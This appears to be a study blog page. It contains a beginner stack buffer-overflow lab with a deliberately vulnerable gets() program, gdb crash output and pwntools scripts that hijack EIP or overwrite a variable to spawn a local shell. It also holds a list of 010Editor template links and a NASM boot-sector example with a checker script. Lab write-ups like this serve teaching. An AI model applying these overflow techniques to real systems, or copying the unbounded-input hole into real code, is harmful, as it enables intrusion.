First overflow program test

After studying overflows a little: this challenge is designed so that gets overwrites key, which makes the program's comparison evaluate true and gives a shell. That is not the only route, though; the saved EIP can also be overwritten directly to get a shell. Original article: https://medium.com/bugbountywriteup/learn-pwntools-step-by-step-8c96f2dba61a
The original article overwrites key; here the attempt is to overwrite EIP instead.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Deliberately vulnerable target: gets() has no bound, so a long line
 * overwrites key (at [ebp+8]) and the saved return address. */
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme); // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

First, use pwntools'
cyclic(0x100) # generate a pattern of 0x100 bytes, i.e. a special string
The point of the pattern is that, once the program crashes, the offset of the overflow can be located in a single step. The generated pattern is:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac
Then run the target program under gdb (compiled with gcc -o bof bof.c -m32 -fno-stack-protector) and feed it the pattern:
gdb-peda$ c
Continuing.
overflow me : aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac
Nah..

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6
EBX: 0x0
ECX: 0xffffffff
EDX: 0xf7fb8870 --> 0x0
ESI: 0xf7fb7000 --> 0x1b1db0
EDI: 0xf7fb7000 --> 0x1b1db0
EBP: 0x6161616b ('kaaa')
ESP: 0xffffd540 ("maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaac"...)
EIP: 0x6161616c ('laaa')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x6161616c
[------------------------------------stack-------------------------------------]
0000| 0xffffd540 ("maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaac"...)
0004| 0xffffd544 ("naaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaac"...)
0008| 0xffffd548 ("oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac")
0012| 0xffffd54c ("paaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac")
0016| 0xffffd550 ("qaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac")
0020| 0xffffd554 ("raaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac")
0024| 0xffffd558 ("saaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac")
0028| 0xffffd55c ("taaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x6161616c in ?? ()   // the overflow point: EIP now holds 4 bytes of the pattern
gdb-peda$
Then use cyclic_find to look up where that value sits in the pattern:

>>> cyclic_find(0x6161616c)
44

So the overflow point is at offset 44.
Next, objdump -d the target program; the address of the system("/bin/sh") call sequence is 80484cc:
80484cc: 68 af 85 04 08 push $0x80485af
80484d1: e8 9a fe ff ff call 8048370

Then write a script to test the overflow:
#!/usr/bin/env python3
# encoding: utf-8
# (The post's original script was Python 2; pwntools on Python 3 needs bytes for the payload.)

from pwn import *

sh = process("/root/learnpwn/bof")
print(sh.recvline(timeout=1))
# 44 bytes of padding reach the saved return address; p32() packs the
# address of the `push 0x80485af; call system` sequence little-endian.
sh.sendline(b"A" * 44 + p32(0x80484cc))
sh.interactive()

And we get a shell:
>>> from pwn import *
>>>
>>> sh = process("/root/learnpwn/bof")
[x] Starting local process '/root/learnpwn/bof'
[+] Starting local process '/root/learnpwn/bof': pid 45949
>>> print sh.recvline(timeout=1)

>>> sh.sendline("A" * 44 + p32(0x80484cc))
>>> sh.interactive()
[*] Switching to interactive mode
overflow me : Nah..
whoami
root


Original method (overwrite key instead of EIP):

ECX: 0xf7fb75a0 --> 0xfbad2288
EDX: 0xf7fb887c --> 0x0
ESI: 0xf7fb7000 --> 0x1b1db0
EDI: 0xf7fb7000 --> 0x1b1db0
EBP: 0xffffd538 ("kaaalaaamaaa")
ESP: 0xffffd510 ("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa")
EIP: 0x80484c0 (<func+37>: cmp DWORD PTR [ebp+0x8],0xcafebabe)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80484b7 <func+28>: push eax
   0x80484b8 <func+29>: call 0x8048350 <gets@plt>
   0x80484bd <func+34>: add esp,0x10
=> 0x80484c0 <func+37>: cmp DWORD PTR [ebp+0x8],0xcafebabe
   0x80484c7 <func+44>: jne 0x80484db <func+64>
   0x80484c9 <func+46>: sub esp,0xc
   0x80484cc <func+49>: push 0x80485af
   0x80484d1 <func+54>: call 0x8048370 <system@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd510 ("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa")
0004| 0xffffd514 ("baaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa")
0008| 0xffffd518 ("caaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa")
0012| 0xffffd51c ("daaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa")
0016| 0xffffd520 ("eaaafaaagaaahaaaiaaajaaakaaalaaamaaa")
0020| 0xffffd524 ("faaagaaahaaaiaaajaaakaaalaaamaaa")
0024| 0xffffd528 ("gaaahaaaiaaajaaakaaalaaamaaa")
0028| 0xffffd52c ("haaaiaaajaaakaaalaaamaaa")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484c0 in func ()
gdb-peda$ p 0xffffd538
$18 = 0xffffd538
gdb-peda$ x $18+0x8
0xffffd540: "maaa"

>>> cyclic_find("maaa")
48
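Both lookups on this page (EIP = 0x6161616c giving offset 44, and the word at [ebp+8] = "maaa" giving offset 48) rely on the structure of the pattern that cyclic() produces. The following is an added example, not code from the post or from pwntools, that re-implements cyclic() and cyclic_find() so the mechanism is visible: the pattern is a de Bruijn sequence over a-z with window length 4, in which every 4-character window occurs exactly once, so the 4 bytes that end up in a register map back to a unique offset in the input. The alphabet and window length are the pwntools defaults; everything else is this example's own code.

```python
#!/usr/bin/env python3
"""Re-implementation of pwntools' cyclic() / cyclic_find() for illustration.

Added example, not the page's or pwntools' code. The pattern is the de Bruijn
sequence B(26, 4) over 'a'..'z': every 4-character window appears once, so the
4 bytes found in EIP, or in the stack slot that `key` is read from, identify
their offset in the input uniquely.
"""
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"   # pwntools' default alphabet


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) one character at a time.

    Ruskey's algorithm: the concatenation, in lexicographic order, of all
    Lyndon words over the alphabet whose length divides n.
    """
    k = len(alphabet)
    a = [0] * (n + 1)           # current candidate word, 1-indexed

    def db(t, p):
        if t > n:
            if n % p == 0:      # a[1..p] is a Lyndon word whose length divides n
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]     # extend the word periodically ...
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):   # ... then try every larger symbol
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=4):
    """First `length` characters of the pattern, like pwntools' cyclic(length)."""
    return "".join(islice(de_bruijn(alphabet, n), length))


def cyclic_find(subseq, alphabet=ALPHABET, n=4):
    """Offset of a window in the pattern, like pwntools' cyclic_find().

    `subseq` may be the register value as an int (unpacked little-endian, the
    way the x86 stack stores it: 0x6161616c -> "laaa"), or a str/bytes window.
    Returns -1 if the window does not occur in the pattern.
    """
    if isinstance(subseq, int):
        subseq = subseq.to_bytes(n, "little").decode("latin-1")
    elif isinstance(subseq, bytes):
        subseq = subseq.decode("latin-1")
    if len(subseq) != n:
        raise ValueError(f"window must be exactly {n} characters, got {len(subseq)}")
    window = ""
    for pos, ch in enumerate(de_bruijn(alphabet, n)):
        window = (window + ch)[-n:]          # sliding window of the last n chars
        if window == subseq:
            return pos - n + 1               # offset of the window's first char
    return -1


if __name__ == "__main__":
    print(cyclic(0x100))
    print(cyclic_find(0x6161616c))   # EIP from the crash above -> 44
    print(cyclic_find("maaa"))       # word at [ebp+8], i.e. key -> 48
```

Because the pattern is generated lazily, cyclic_find() stops as soon as the window is seen; a window that is not in the pattern (for instance uppercase bytes, or a register that was never touched by the input) is reported as -1, which is the first thing to check before trusting an offset.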

#!/usr/bin/env python3
# encoding: utf-8
# (The post's original script was Python 2; pwntools on Python 3 needs bytes for the payload.)

from pwn import *

sh = process("/root/learnpwn/bof")
print(sh.recvline(timeout=1))
# 48 bytes of padding reach key at [ebp+8]; writing 0xcafebabe there makes the
# comparison succeed and the program itself calls system("/bin/sh").
sh.sendline(b"A" * 48 + p32(0xcafebabe))
sh.interactive()

010Editor template download links

http://www.sweetscape.com/010editor/templates/files/AndroidManifestTemplate.bt
http://www.sweetscape.com/010editor/templates/files/AVITemplate.bt
http://www.sweetscape.com/010editor/templates/files/BMPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CABTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CAPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CDATemplate.bt
http://www.sweetscape.com/010editor/templates/files/CLASSTemplate.bt
http://www.sweetscape.com/010editor/templates/files/CRXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/DBFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/DEXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/DMPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EDIDTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ELFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EMFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EOTTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EVSBTemplate.bt
http://www.sweetscape.com/010editor/templates/files/EXETemplate.bt
http://www.sweetscape.com/010editor/templates/files/exFATTemplate.bt
http://www.sweetscape.com/010editor/templates/files/FAT16Template.bt
http://www.sweetscape.com/010editor/templates/files/FLVTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GeoTIFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GocleverTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GPTTemplate.bt
http://www.sweetscape.com/010editor/templates/files/GZipTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ICOTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ISOBMFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/JPGTemplate.bt
http://www.sweetscape.com/010editor/templates/files/LNKTemplate.bt
http://www.sweetscape.com/010editor/templates/files/LUKSTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MachOTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MBRTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MIDITemplate.bt
http://www.sweetscape.com/010editor/templates/files/Mifare1kTemplate.bt
http://www.sweetscape.com/010editor/templates/files/Mifare4kTemplate.bt
http://www.sweetscape.com/010editor/templates/files/MOBITemplate.bt
http://www.sweetscape.com/010editor/templates/files/MP3Template.bt
http://www.sweetscape.com/010editor/templates/files/OGGTemplate.bt
http://www.sweetscape.com/010editor/templates/files/OscarItemTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PALTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PCAPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PCXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PETemplate.bt
http://www.sweetscape.com/010editor/templates/files/PDFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PNGTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PNG12Template.bt
http://www.sweetscape.com/010editor/templates/files/PSFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/PYCTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RARTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RDBTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RegistryPolicyFileTemplate.bt
http://www.sweetscape.com/010editor/templates/files/RESTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SHPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SHXTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SRecTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SSPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/STLTemplate.bt
http://www.sweetscape.com/010editor/templates/files/SWFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TacxTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TOCTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TIFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/TGATemplate.bt
http://www.sweetscape.com/010editor/templates/files/TTFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/UTMPTemplate.bt
http://www.sweetscape.com/010editor/templates/files/VHDTemplate.bt
http://www.sweetscape.com/010editor/templates/files/WAVTemplate.bt
http://www.sweetscape.com/010editor/templates/files/WinhexPosTemplate.bt
http://www.sweetscape.com/010editor/templates/files/WMFTemplate.bt
http://www.sweetscape.com/010editor/templates/files/ZIPTemplate.bt

Source code of my first bootable floppy image written in assembly

	org 07c00h		; the BIOS loads the boot sector at 0000:7C00
	mov ax,	cs
	mov ds,	ax
	mov es,	ax		; ES:BP must point at the string for int 10h, AH=13h
	call DispStr
	jmp $			; hang here after printing
DispStr:
	mov ax,	BootMessage
	mov bp,	ax		; ES:BP = address of the string
	mov cx,	MsgLen		; CX = string length (was hard-coded 16 for a 12-byte string)
	mov ax,	01301h		; AH=13h write string, AL=01h: advance cursor, attribute in BL
	mov bx,	000ch		; BH=0 page 0, BL=0Ch bright red on black
	mov dl,	0		; DL = column 0 (DH = row is left as it is)
	int 10h
	ret
BootMessage:	db	"Hello,My Os!"
MsgLen	equ	$-BootMessage
times 510-($-$$)	db 0	; zero-pad up to byte 510
dw 0xaa55			; boot signature: bytes 55h AAh at offsets 510 and 511
times 16800-($-$$)	db 0	; pad the image out to 16800 bytes

Assemble the program above with NASM, rename the output to asm.img, and load it in a virtual machine: it boots and shows Hello,My Os! on the boot screen. It can of course also be written to a floppy to boot a real machine.
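Before handing an image like asm.img to a VM it is worth checking the two things the BIOS actually requires, a full 512-byte first sector and the 55h AAh signature at offsets 510 and 511, since `dw 0xaa55` emitting those two bytes little-endian is the easiest thing to get wrong. The script below is an added example, not part of the original post: it reads an image file given on the command line (or, with no argument, a constructed stand-in sector built inline, not NASM output) and reports the sector properties, the offset of the message text, and whether the `mov ax, BootMessage` immediate that the `org 07c00h` origin implies is present in the code.

```python
#!/usr/bin/env python3
"""Sanity-check a raw boot-sector image such as asm.img (added example, not
part of the original post).

Checks: at least one full 512-byte sector; boot signature 0x55 0xAA in the
last two bytes of that sector (what `dw 0xaa55` emits); the message string is
present; and the 16-bit address `org 07c00h` implies for it appears as an
immediate in the code (the `mov ax, BootMessage` operand).
"""
import struct
import sys

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"   # `dw 0xaa55` written little-endian at offset 510
LOAD_ADDRESS = 0x7C00          # where the BIOS loads the first sector (org 07c00h)


def check_boot_sector(image: bytes, message: bytes = b"Hello,My Os!") -> dict:
    """Return a report describing whether `image` looks like a valid boot sector."""
    report = {
        "size": len(image),
        "has_full_sector": len(image) >= SECTOR_SIZE,
        "has_signature": False,
        "message_offset": -1,
        "message_address": None,
        "address_referenced": False,
        "bootable": False,
    }
    if not report["has_full_sector"]:
        return report                       # too short to be a boot sector at all
    sector = image[:SECTOR_SIZE]
    report["has_signature"] = sector[510:512] == BOOT_SIGNATURE
    off = sector.find(message)
    if off != -1:
        report["message_offset"] = off
        addr = LOAD_ADDRESS + off           # what `mov ax, BootMessage` must load
        report["message_address"] = addr
        # mov ax, imm16 encodes the immediate little-endian; check it occurs.
        report["address_referenced"] = struct.pack("<H", addr) in sector
    report["bootable"] = report["has_full_sector"] and report["has_signature"]
    return report


def build_sample_image(with_signature: bool = True) -> bytes:
    """Constructed stand-in sector (not NASM output): `jmp $`, a `mov ax, imm16`
    pointing at the message, the message, zero padding, optional signature."""
    message = b"Hello,My Os!"
    stub = b"\xeb\xfe"                      # jmp $ (2 bytes)
    msg_off = len(stub) + 3                 # message follows the 3-byte mov ax, imm16
    mov_ax = b"\xb8" + struct.pack("<H", LOAD_ADDRESS + msg_off)
    sector = bytearray(stub + mov_ax + message)
    sector += b"\x00" * (510 - len(sector))
    sector += BOOT_SIGNATURE if with_signature else b"\x00\x00"
    return bytes(sector)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        data = build_sample_image()
    for key, value in check_boot_sector(data).items():
        print(f"{key}: {value}")
```

Run it as `python3 check_boot.py asm.img`; an image whose report shows has_signature False will be ignored by the BIOS even if everything else is right, and a message_offset of -1 usually means the string was padded away or the file was truncated.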